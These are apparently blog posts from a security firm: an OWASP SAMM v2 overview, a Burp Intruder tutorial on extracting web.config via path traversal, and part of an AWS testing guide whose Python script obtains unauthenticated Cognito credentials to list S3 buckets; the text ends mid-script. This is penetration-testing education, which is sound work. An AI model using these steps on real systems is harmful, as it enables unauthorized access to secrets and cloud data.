https://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/enhanced.html</div>
<div style="text-align: justify;">
https://owasp.org/www-community/attacks/CSV_Injection</div>
<div style="text-align: justify;">
https://beefproject.com/</div>
</div>
</div>
Fabrizio Buglihttp://www.blogger.com/profile/02917760476807817801noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-16081731576122460062020-04-30T06:38:00.000-07:002020-04-30T06:38:58.864-07:00 OWASP SAMM v2: lessons learned after 9 years of assessment<h3>
<br /></h3>
<h3>
OWASP SAMM v2 is out!</h3>
<br />OWASP SAMM (Software Assurance Maturity Model) is the OWASP framework to help organizations assess, formulate, and implement, through our self-assessment model, a strategy for software security that can be integrated into their existing Software Development Lifecycle (SDLC).<br />
<br />
<h4>
The new OpenSAMM</h4>
<br />The original model OpenSAMM 1.0 was written by Pravir Chandra and dates back to 2009. Over the last 10 years, it has proven a widely distributed and effective model for improving secure software practices in different types of organizations. With SAMM v2, further improvements have been made to deal with some of its perceived limitations.<br /><br />For those organizations using earlier versions of SAMM, it is important to take the time to understand how the framework has evolved in favor of automation and better alignment with development teams.<br /><br />The new model supports maturity measurements both from coverage and quality perspectives. It added new quality criteria for all the activities. There is an updated scoring SAMM toolbox designed to help assessors and organizations with their software assurance assessments and roadmaps.<br /><br />
<h4>
What about your development models?</h4>
<br />The new SAMM model is development paradigm agnostic. It supports waterfall, iterative, agile, and DevOps development. The model is flexible enough to allow organizations to take a path based on their risk tolerance and the way they build and use software. The model is built upon the core business functions of software development, with security assurance practices.<br />
<br />
<h4>
What’s changed with SAMM v2?</h4>
<br />The version 2.0 of the model now supports frequent updates through small incremental changes on specific parts of the model with regular updates to explanations, tooling, and guidance by the community.<br /><br />The 3 maturity levels remain as they were. Level 1 is initial implementation; level 2, structured realization; and level 3, optimized operation.<br /><br />This is the updated SAMM version 2 model:<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivxT14B9PzZFMwh_BR694a6iRKBZ3dPlas0DYRrWXVxPuYAQPcr3GBI3bs9kVhWq1K2J-HKjWkyrrOFRygHnKhcNqip_GbDyMw17Dq-fT3YqWQBccue09-LNXiye7jTG4MYY3l-5OFFCU/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="856" data-original-width="1520" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivxT14B9PzZFMwh_BR694a6iRKBZ3dPlas0DYRrWXVxPuYAQPcr3GBI3bs9kVhWq1K2J-HKjWkyrrOFRygHnKhcNqip_GbDyMw17Dq-fT3YqWQBccue09-LNXiye7jTG4MYY3l-5OFFCU/s640/image1.png" width="640" /></a></div>
<br />The major changes are the following:<br /><br /> - From 4 to 5 business functions and from 12 to 15 Security Practices.<br /> - The 4 business functions of version 1.5 now become 5 core business functions:<br /><br /> - Governance<br /> - Design (which used to be Construction)<br /> - Implementation<br /> - A redesigned Verification function<br /> - Operations<br /><br /> - Implementation, to represent a number of core activities in the build and deploy domains of an organization. It also includes a new security practice that deals with Defect Management or fixing process.<br /> - New security practices are: Secure Build, Secure Deployment, Defect Management, Architecture Analysis, Requirements-driven Testing.<br /> - A new concept appears with version 2, called Streams: activities are now presented in logical flows throughout each of the now 15 security practices, divided into two streams, which aligns and links the activities in the practice over the different maturity levels. Each stream has an objective that can be reached in increasing levels of maturity.<br /><br /> - The model now supports maturity measurements both from a coverage and a quality perspective. There are new quality criteria for all the SAMM activities, and an updated scoring model to help SAMM assessors and organizations with their software assurance.<br /><br />
<h4>
What we learned in the last 9 years of assessments</h4>
Minded Security did many Software Security Assessments based on SAMM v1
and v1.5. The following diagram shows the results of the assessments:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZfzJ6N2sYVfKO1FQi04BoNBVUREGmqGjVOEGJDiA9iBorWJUiV68xTUXXr64foqIaziKiBqXqJGdpfVGSf7gkya2M86hcY7oIyEotyzXzzu-b3t_JmFkeDxqpTWBhunaagEYGGk7-_Kk/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="748" data-original-width="1151" height="414" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZfzJ6N2sYVfKO1FQi04BoNBVUREGmqGjVOEGJDiA9iBorWJUiV68xTUXXr64foqIaziKiBqXqJGdpfVGSf7gkya2M86hcY7oIyEotyzXzzu-b3t_JmFkeDxqpTWBhunaagEYGGk7-_Kk/s640/image2.png" width="640" /></a></div>
<br /><br />We collected SAMM assessment results performed until 2012 (blue line) and then from 2013 to 2015 (orange line) and then from 2016 to 2018 (gray line).<br /><br />As you can see from the 2012’s results, the first answer of a Company to the software security issues is: testing, testing, testing!<br /><br />What we learned during these years is that testing is NOT the solution of Software Security. Testing is just a part of your Software Security journey.<br /><br />The security efforts of software developers are currently being stymied by time constraints, complexity, and deployment frequency. <br /><br />The timeline for reporting and fixing critical vulnerabilities – up to one month to share, up to six months to fix – remains unacceptably long. <br /><br />Today we need instant security feedback: key to achieving a fix within hours of discovery are new standards, more automation, and promptly sharing vulnerability information internally.<br /><br />That’s why you need to improve all the security practices of the SAMM model in order to manage Software Security properly. A SAMM assessment permits you to have a complete vision of the problem: today the SAMM framework has become crucial to build an efficient, solid Software Security Roadmap in the Companies.<br /><br /><br /><br /><br /><br />Matteo Meuccihttp://www.blogger.com/profile/14563434479199405929noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-15106636045720765962020-03-17T04:20:00.000-07:002020-03-17T04:41:22.606-07:00How to Path Traversal with Burp Community Suite <br />
<h3>
Introduction</h3>
<br />
<div>
A well-known, never out of fashion and highly impact vulnerability is the <a href="https://owasp.org/www-community/attacks/Path_Traversal" target="_blank">Path Traversal</a>. This technique is also known as dot-dot-slash attack (../) or as a directory traversal, and it consists in exploiting an insufficient security validation/sanitization of user input, which is used by the application to build pathnames to retrieve files or directories from the file system that is located underneath a restricted parent directory.<br />
By manipulating the values through special characters an attacker can cause the pathname to resolve to a location that is outside of the restricted directory.<br />
<br />
In OWASP terms, a path traversal attack falls under the category A5 of the top 10 (2017): Broken Access Control, so as one of top 10 issues of 2017 we should give it a special attention.<br />
<br />
In this blog post we will explore an example of web.config exfiltration via path traversal using <b>Burp Suite Intruder Tool</b>.<br />
<br />
Previous posts about path traversal:<br />
<a href="https://blog.mindedsecurity.com/2018/10/how-to-prevent-path-traversal-in-net.html" target="_blank">How to prevent Path Traversal in .NET</a><br />
<a href="https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html" target="_blank">From Path Traversal to Source Code in Asp.NET MVC Applications</a></div>
<div>
<h3>
Testing Step-by-Step</h3>
</div>
<div>
First, get a copy of <a href="https://portswigger.net/burp/communitydownload">Burp Suite Community Edition</a>, a useful testing tool that provides many automated and semi-automated features to improve security testing performances.<br />
In particular, <i><a href="https://portswigger.net/burp/documentation/desktop/tools/intruder/using" target="_blank">Burp Intruder</a></i> feature can be very useful to exploit path traversal vulnerabilities.</div>
<div>
<br />
Suppose there's a <i>DotNet web application </i>vulnerable to path traversal. In order to exploit the issue the attacker can try to download the whole source code of the application by following <a href="https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html" target="_blank">this tutorial</a>.<br />
<br /></div>
<div>
Once the attacker finds a server endpoint that might be vulnerable to Path Traversal, it's possible to send it to <i>Burp Intruder</i> as shown in the following screenshot.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmsASlKPCYiIYcdX0-Gah5sNDQj1Fqhcb95wNqB30uN3hU0HbBnO-U_pH3M2o18O2Jbiajc2_gI1vuU2FUEo8pkt2opt8WImMBaicvkDWdF7Pa1sND98bYzZQ0FIdvUUnuUXBoPqkS85I/s1600/SendToIntruder.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1365" data-original-width="1600" height="545" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmsASlKPCYiIYcdX0-Gah5sNDQj1Fqhcb95wNqB30uN3hU0HbBnO-U_pH3M2o18O2Jbiajc2_gI1vuU2FUEo8pkt2opt8WImMBaicvkDWdF7Pa1sND98bYzZQ0FIdvUUnuUXBoPqkS85I/s640/SendToIntruder.PNG" width="640" /></a></div>
<div>
<br /></div>
<div>
<br />
On the Intruder tab, the target has been set with the request that it will be used to manipulate in order to find the <i>web.config</i> file.</div>
<div>
<br /></div>
<div>
Make sure that the payload is correctly injected in the right attribute position, if not, perform a "Clear §" action, then select the attribute to fuzz and click on "Add §" button. </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitDzejk8AqLSIl5JN5uRfnmUXUdDfcRX7mbsTevs6kv9eT0sn9Rda79Q79wUV7eSTb4cG6vNhCRAH4RA9trMSiZf4s5I-NaPdbD96xAuufrDoDRRCgOnzJZRX8UZpaw-1cWKDJ0ePOHeY/s1600/IntruderPreview.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1338" data-original-width="1600" height="532" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitDzejk8AqLSIl5JN5uRfnmUXUdDfcRX7mbsTevs6kv9eT0sn9Rda79Q79wUV7eSTb4cG6vNhCRAH4RA9trMSiZf4s5I-NaPdbD96xAuufrDoDRRCgOnzJZRX8UZpaw-1cWKDJ0ePOHeY/s640/IntruderPreview.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br class="Apple-interchange-newline" /></div>
To set the payloads that Burp Intruder will use to perform the requests, download file <a href="https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/path-traversal/traversals-8-deep-exotic-encoding.txt">traversals-8-deep-exotic-encoding.txt</a> from <a href="https://github.com/fuzzdb-project/fuzzdb">fuzzdb project</a> and provide it to <i>Burp Intruder </i>by executing the following actions:<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li>go to the "Payloads" sub-tab;</li>
<li>select from dropdown list "Payload type" the value "Simple List";</li>
<li>in the panel "Payload Options" click on "Load..." button and select the fuzzing path traversal file (as shown in following screenshot).</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCX9Wh76nIEIybxAzj3IirS-CVi5N_2XYPwRHuZXHHU2f7QiUmJVEQvzsRdPj3-fkVaKUJ0bZ6jsw1pODi3lon0k_xW6MadF0LvDgzxjl2mAPwX9CtzeRkfAe2m57M-9HFHxLvP4APzK8/s1600/PayloadConfiguration.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1338" data-original-width="1600" height="532" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCX9Wh76nIEIybxAzj3IirS-CVi5N_2XYPwRHuZXHHU2f7QiUmJVEQvzsRdPj3-fkVaKUJ0bZ6jsw1pODi3lon0k_xW6MadF0LvDgzxjl2mAPwX9CtzeRkfAe2m57M-9HFHxLvP4APzK8/s640/PayloadConfiguration.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
Next step is to add a Payload Processing rule in order to match and replace the placeholder "{FILE}" with the filename we want to exfiltrate (in our example "web.config"), so click on "Add button".</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCzydd0_TkFx1GAM7_yboWzDMrIV2Jr5GUKQ3bUKgUlPE9Fkpg08S3n72giVzgdrk7dKNGYjK7avTCyoTIqqmrLBM7ADjbudTa9yKvHuXBpjdxTrggE1QCO-LBgpezAcVcrYEDPH-BLO0/s1600/screenshot+Burp+1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="1515" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCzydd0_TkFx1GAM7_yboWzDMrIV2Jr5GUKQ3bUKgUlPE9Fkpg08S3n72giVzgdrk7dKNGYjK7avTCyoTIqqmrLBM7ADjbudTa9yKvHuXBpjdxTrggE1QCO-LBgpezAcVcrYEDPH-BLO0/s640/screenshot+Burp+1.PNG" width="606" /></a></div>
<br />
<br />
In the paylod processing rule modal, add the Match for string "{FILE}" and the Replace for string "web.config", as shown in following screenshot:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJsQsM1Vc0Tljg52alKKtiaQyyz6E7R1DIqLLiYzqon3XZ48c_xT-qq28yZEUmpi7R9hq3aYJ8vN-EzC2CCRV7Y92MqEo0Uyartgn3FsyAicKP25j3x1z7m6MhctZQutbrlMFG1NyFMWA/s1600/screenshot+Burp+2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="1562" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJsQsM1Vc0Tljg52alKKtiaQyyz6E7R1DIqLLiYzqon3XZ48c_xT-qq28yZEUmpi7R9hq3aYJ8vN-EzC2CCRV7Y92MqEo0Uyartgn3FsyAicKP25j3x1z7m6MhctZQutbrlMFG1NyFMWA/s640/screenshot+Burp+2.PNG" width="624" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In order to improve the probability of a successful attack, it is possible to add a Grep-Match value (if known), in order to easily identify a positive response.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Remove all already existing rules:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfJ2scT_vfa24m-Rb0kWO_yklJOrZ0pQLT5sqO7dnjIQpiGvlwZNhZ2fvwe3G8NDOz3sIHgFtF-ekI_fiGfNVbkc_y_mtdl9thIHtpyy67rjU80c8ZkJj3GWsPi5jQcmmFWWcVH5m0XJU/s1600/GrepMatchOptions1.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><br /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfJ2scT_vfa24m-Rb0kWO_yklJOrZ0pQLT5sqO7dnjIQpiGvlwZNhZ2fvwe3G8NDOz3sIHgFtF-ekI_fiGfNVbkc_y_mtdl9thIHtpyy67rjU80c8ZkJj3GWsPi5jQcmmFWWcVH5m0XJU/s1600/GrepMatchOptions1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1406" data-original-width="1600" height="562" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfJ2scT_vfa24m-Rb0kWO_yklJOrZ0pQLT5sqO7dnjIQpiGvlwZNhZ2fvwe3G8NDOz3sIHgFtF-ekI_fiGfNVbkc_y_mtdl9thIHtpyy67rjU80c8ZkJj3GWsPi5jQcmmFWWcVH5m0XJU/s640/GrepMatchOptions1.PNG" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Then add a new Grep-Match rule for "<configuration>" string, that indicates web.config file has been found.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="margin-left: 1em; margin-right: 1em;">
<div style="text-align: center;">
<img border="0" data-original-height="1406" data-original-width="1600" height="562" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu-vNtVBHcQ0dKQV9hJusqjjNXTD3V7hm2MSjZ2J5fQlm04Q4K5fWay-y1nqIWXf49KMr2OFLFWeG60DJwnrSxZ_I5As4gV0kEGufwUxQ1-vPiCtceSr67nY6PjIX0TvItRIeshrC10TI/s640/GrepMatchOptions2.PNG" width="640" /></div>
</div>
<br />
<div style="margin-left: 1em; margin-right: 1em;">
</div>
<br />
<div style="text-align: center;">
</div>
<div>
<br />
Finally, it's suggested to tune the Request Engine options basing on web server limitations (anti-throttling, firewall system, etc) in order to avoid false negative results, for example increasing retry delay.<br />
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQe-wjFTFj_SQvnpahyphenhyphen-LBdzWgjqCZE-3UeWrdwyv1ePHA9Wfq8-OCbGiyYBP0LTqDQb9w6CVRgQgcEw2rj7e8GBxwaWYyx916wPM78Wex6IEwuISXiGLmA9expFYGgVL_UOJbAKwUXBk/s1600/StartAttack.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1406" data-original-width="1600" height="562" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQe-wjFTFj_SQvnpahyphenhyphen-LBdzWgjqCZE-3UeWrdwyv1ePHA9Wfq8-OCbGiyYBP0LTqDQb9w6CVRgQgcEw2rj7e8GBxwaWYyx916wPM78Wex6IEwuISXiGLmA9expFYGgVL_UOJbAKwUXBk/s640/StartAttack.PNG" width="640" /></a></div>
<br />
<br /></div>
<div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
<b>Let's launch the attack. </b></div>
<div class="separator" style="clear: both;">
<br /></div>
If the endpoint will result vulnerable to path traversal, the column "configuration" will be checked.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDXUlRQpmsaljyh_z7j-QdoeBF_4hZxwt7XTuYnb6utZIxPbIei7U01xHl4usJnOFWDvUYakToXG6qtXsTtm2JjtBTGUtxVSvu09bx108vWhyImmprq1INYHSieBsj7xZJ3v4mzmqLmW0/s1600/AttackResultOrdered.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1245" data-original-width="1600" height="498" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDXUlRQpmsaljyh_z7j-QdoeBF_4hZxwt7XTuYnb6utZIxPbIei7U01xHl4usJnOFWDvUYakToXG6qtXsTtm2JjtBTGUtxVSvu09bx108vWhyImmprq1INYHSieBsj7xZJ3v4mzmqLmW0/s640/AttackResultOrdered.PNG" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWao7_MpXEfrKlofdlG8Mphrh1IAaI8NuVrsqErRtt8xeMwKbQxwiWWktcxuRp-Nk6UPV4vAzGgitz1FcIrhmZLbwhe4RBG7E9mYG40p90Xl7WTebnPZExszwa_xD7PxP28RsOUxfAYw4/s1600/WebConfigExtracted.PNG" imageanchor="1" style="display: inline; margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1245" data-original-width="1600" height="498" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWao7_MpXEfrKlofdlG8Mphrh1IAaI8NuVrsqErRtt8xeMwKbQxwiWWktcxuRp-Nk6UPV4vAzGgitz1FcIrhmZLbwhe4RBG7E9mYG40p90Xl7WTebnPZExszwa_xD7PxP28RsOUxfAYw4/s640/WebConfigExtracted.PNG" width="640" /></a></div>
<div>
<h3>
</h3>
<h2>
</h2>
</div>
</div>
<div>
<br /></div>
Enrico Aleandrihttp://www.blogger.com/profile/09980179286611297040noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-4637314024281022342020-02-14T03:52:00.002-08:002020-08-03T06:48:13.270-07:00A practical guide to testing the security of Amazon Web Services (Part 3: AWS Cognito and AWS CloudFront)This is the last part of our 3 posts journey discussing the main Amazon Web Services and their security.<br />
<br />
In the previous two parts we discussed two of the most used Amazon services, namely AWS S3 and AWS EC2. If you still haven't checked them, you can find them here: <a href="https://blog.mindedsecurity.com/2018/09/a-practical-guide-to-testing-security.html" target="_blank">Part 1</a> and <a href="https://blog.mindedsecurity.com/2018/09/a-practical-guide-to-testing-security_18.html" target="_blank">Part 2</a>.<br />
<br />
In this final post we discuss two additional services that you might encounter when analyzing the security of a web application: <i><a href="https://aws.amazon.com/it/cognito/" target="_blank">AWS Cognito</a></i> and <i><a href="https://aws.amazon.com/it/cloudfront/" target="_blank">AWS CloudFront</a></i>.<br />
These are two very different services related to supporting web applications in two specific areas:<br />
<br />
<ul>
<li><i>AWS Cognito</i> aims at providing an access control system that developers can implement in their web applications. </li>
<li><i>AWS CloudFront</i> is a Content Delivery Network (CDN) that delivers your data to the users with low latency and high transfer speed.</li>
</ul>
<br />
<br />
<h3>
AWS Cognito</h3>
<div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpqySyjh0heiZdC-zhFWBfDBTc6WKv-m60tShU5mi-gOU2JpbtSwKVRbphPGM1B4uQQ9mdfjKGxlsHCNPsAZHTlvw20cgkEK7otDlJMEl_qUlLipboWd48lp4s8QFEhxjoI90Nhv2fsvKj/s1600/MobileServices_AmazonCognito.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: center;"><img border="0" data-original-height="400" data-original-width="400" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpqySyjh0heiZdC-zhFWBfDBTc6WKv-m60tShU5mi-gOU2JpbtSwKVRbphPGM1B4uQQ9mdfjKGxlsHCNPsAZHTlvw20cgkEK7otDlJMEl_qUlLipboWd48lp4s8QFEhxjoI90Nhv2fsvKj/s200/MobileServices_AmazonCognito.png" width="200" /></a><br /><br />It provides developers with an authentication, authorization and user management system that can be implemented in web applications and<span style="text-align: center;"> is divided in two components:</span><br />
<br />
<ul>
<li><span style="text-align: center;">user pools;</span></li>
<li><span style="text-align: center;">identity pools. </span></li>
</ul>
Quoting <a href="https://docs.amazonaws.cn/en_us/cognito/latest/developerguide/cognito-scenarios.html" target="_blank">AWS documentation</a> on Cognito:<br />
<blockquote class="tr_bq">
User pools are user directories that provide sign-up and sign-in options for your app users. Identity pools enable you to grant your users access to other AWS services. You can use identity pools and user pools separately or together.</blockquote>
From a security perspective, we are particularly interested in <i>identity pools</i> as they provide access to other AWS services we might be able to mess with.<br />
<br />
Identity pools are identified by an ID that looks like this:<br />
<blockquote class="tr_bq">
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new", courier, monospace;">us-east-1:1a1a1a1a-ffff-1111-9999-12345678</span></blockquote>
<br />
A web application will then query AWS Cognito by specifying the proper <i>Identity pool ID</i> in order to get temporary limited-privileged AWS credentials to access other AWS services.<br />
<br />
An identity pool also allows to specify a role for users that are not authenticated.<br />
Amazon documentation states:<br />
<blockquote class="tr_bq">
Unauthenticated roles define the permissions your users will receive when they access your identity pool without a valid login.</blockquote>
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGCIv1qSXnJOK-b9IgjFKP3usDLAxE-kkhjy7USy5E6DVoOVxzaV4YAx0HNv26W08HX_NuTIJWF5gbNP1W1JLGgAY_E2GJ-SJvDZ-KMPu78yQhYIZy0z_0TqPdXAuts0ekm0ICnBYvX0DY/s1600/unauthenticated.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="144" data-original-width="687" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGCIv1qSXnJOK-b9IgjFKP3usDLAxE-kkhjy7USy5E6DVoOVxzaV4YAx0HNv26W08HX_NuTIJWF5gbNP1W1JLGgAY_E2GJ-SJvDZ-KMPu78yQhYIZy0z_0TqPdXAuts0ekm0ICnBYvX0DY/s1600/unauthenticated.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br />
This is clearly something worth checking during the assessment of a web application that takes advantage of AWS Cognito.<br />
<br />
In fact, let's consider the following scenario of a web application that allows access to AWS S3 buckets upon proper authentication with the identity pool that provides temporary access to the bucket.<br />
<br />
Now suppose that the identity pool has also been configured to grant access to unauthenticated identities with the same privileges of accessing AWS S3 buckets.<br />
<br />
<span style="background-color: white;">In such a situation, an attacker will be able to access the application credentials to AWS.</span><br />
<span style="background-color: yellow;"><br /></span>
The following python script will try to get unauthenticated credentials and use them to list the AWS S3 buckets.<br />
<br /></div>
<div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
In the following script, just replace <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new", courier, monospace;">IDENTITY_POOL</span> with the Identity Pool ID identified during the assessment. </div>
<div>
<br /></div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383">
</span>
<br />
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-family: "courier new"; font-size: 10pt; white-space: pre;"># NB: </span><span style="font-family: arial, helvetica, sans-serif; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;">This script requires boto3. </span><br />
<span style="font-family: arial, helvetica, sans-serif; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"># Install it with</span><span style="font-family: "courier new"; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;">:</span><br />
<span style="background-color: transparent; font-family: "courier new"; font-size: 10pt; white-space: pre;"># sudo </span><span style="font-family: "courier new", courier, monospace; font-size: 13.3333px; white-space: pre-wrap;">pip install boto3</span><br />
<span style="background-color: transparent; font-family: "courier new"; font-size: 10pt; white-space: pre;">import boto3</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">from botocore.exceptions import ClientError</span></span><br />
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">try:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> # Get access token</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> client = boto3.client('cognito-identity', region_name="us-east-2")</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> resp = client.get_id(IdentityPoolId=[IDENTITY_POOL])</span></span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> print "\nIdentity ID: %s"%(resp['IdentityId'])</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> print "\nRequest ID: %s"%(resp['ResponseMetadata']['RequestId'])</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> resp = client.get_credentials_for_identity(IdentityId=resp['IdentityId'])</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
